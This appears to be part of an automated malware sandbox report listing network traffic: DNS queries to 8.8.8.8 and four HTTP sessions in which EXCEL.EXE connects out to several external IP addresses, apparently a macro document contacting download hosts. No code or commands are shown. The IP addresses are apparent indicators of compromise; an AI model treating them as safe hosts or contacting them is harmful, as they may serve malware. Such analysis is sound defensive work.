Feb 23, 2021 14:26:06.376871109 CET | 64801 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:06.425924063 CET | 53 | 64801 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:10.043467045 CET | 61721 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:10.092130899 CET | 53 | 61721 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:20.651405096 CET | 51255 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:20.703030109 CET | 53 | 51255 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:21.851123095 CET | 61522 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:21.904052973 CET | 53 | 61522 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:23.201653004 CET | 52337 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:23.253521919 CET | 53 | 52337 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:24.495584965 CET | 55046 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:24.544322014 CET | 53 | 55046 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:25.387270927 CET | 49612 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:25.435830116 CET | 53 | 49612 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:26.181955099 CET | 49285 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:26.231391907 CET | 53 | 49285 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:31.689260006 CET | 50601 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:31.739661932 CET | 53 | 50601 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:32.445811987 CET | 60875 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:32.538589954 CET | 53 | 60875 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:33.030227900 CET | 56448 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:33.091103077 CET | 53 | 56448 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:33.660463095 CET | 59172 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:33.710828066 CET | 53 | 59172 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:34.139489889 CET | 62420 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:34.211030006 CET | 53 | 62420 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:34.353008986 CET | 60579 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:34.401853085 CET | 53 | 60579 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:35.403145075 CET | 50183 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:35.486800909 CET | 53 | 50183 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:37.610733032 CET | 61531 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:37.667984962 CET | 53 | 61531 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:38.207225084 CET | 49228 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:38.264324903 CET | 53 | 49228 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:39.008949041 CET | 59794 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:39.066279888 CET | 53 | 59794 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:39.966912031 CET | 55916 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:40.024174929 CET | 53 | 55916 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:40.486193895 CET | 52752 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:40.549102068 CET | 53 | 52752 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:26:49.305099010 CET | 60542 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:26:49.363445997 CET | 53 | 60542 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:27:19.136259079 CET | 60689 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:27:19.185045958 CET | 53 | 60689 | 8.8.8.8 | 192.168.2.4 |
Feb 23, 2021 14:27:20.369985104 CET | 64206 | 53 | 192.168.2.4 | 8.8.8.8 |
Feb 23, 2021 14:27:20.442787886 CET | 53 | 64206 | 8.8.8.8 | 192.168.2.4 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 23, 2021 14:25:52.664776087 CET | 192.168.2.4 | 8.8.8.8 | 0x838b | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 23, 2021 14:25:53.498677969 CET | 192.168.2.4 | 8.8.8.8 | 0x50ec | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 23, 2021 14:25:54.586744070 CET | 192.168.2.4 | 8.8.8.8 | 0x46df | Standard query (0) | A (IP address) | IN (0x0001) | |
Feb 23, 2021 14:25:57.734325886 CET | 192.168.2.4 | 8.8.8.8 | 0x8b5a | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 23, 2021 14:25:52.865950108 CET | 8.8.8.8 | 192.168.2.4 | 0x838b | No error (0) | 72.52.227.180 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 14:25:53.696513891 CET | 8.8.8.8 | 192.168.2.4 | 0x50ec | No error (0) | 162.241.80.6 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 14:25:54.891293049 CET | 8.8.8.8 | 192.168.2.4 | 0x46df | No error (0) | 138.36.237.100 | A (IP address) | IN (0x0001) | ||
Feb 23, 2021 14:25:57.783886909 CET | 8.8.8.8 | 192.168.2.4 | 0x8b5a | No error (0) | 91.199.212.52 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49730 | 72.52.227.180 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 14:25:53.024821997 CET | 2534 | OUT | |
Feb 23, 2021 14:25:53.485604048 CET | 2589 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.4 | 49732 | 162.241.80.6 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 14:25:53.866291046 CET | 2951 | OUT | |
Feb 23, 2021 14:25:54.569462061 CET | 3145 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.4 | 49734 | 138.36.237.100 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 14:25:55.179770947 CET | 3152 | OUT | |
Feb 23, 2021 14:25:56.756165028 CET | 3172 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.4 | 49738 | 91.199.212.52 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 23, 2021 14:25:57.848548889 CET | 3185 | OUT | |
Feb 23, 2021 14:25:57.911541939 CET | 3187 | IN |